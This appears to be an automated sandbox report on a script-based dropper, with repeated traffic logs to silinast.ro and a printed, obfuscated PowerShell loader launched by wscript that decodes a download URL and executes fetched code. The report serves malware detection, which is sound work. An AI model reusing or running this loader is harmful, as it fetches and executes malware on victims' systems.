      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /Juglandin.xtp HTTP/1.1Host: silinast.roConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: 6777.6777.6777.677e
      Source: global trafficDNS traffic detected: DNS query: silinast.ro
      Source: powershell.exe, 00000005.00000002.4640956886.0000015D901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D81CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://silinast.ro
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81928000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81BA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D815C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81D6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D813E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D8188B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D813A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D80FCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D817EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81486000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D80DE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D8195E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81C0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D819FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D80D62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4613344132.0000015D81A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://silinast.ro(
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://silinast.ro/Juglandin.xtpP
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000005.00000002.4640956886.0000015D901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

      System Summary

      barindex
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor ';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'Contral
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 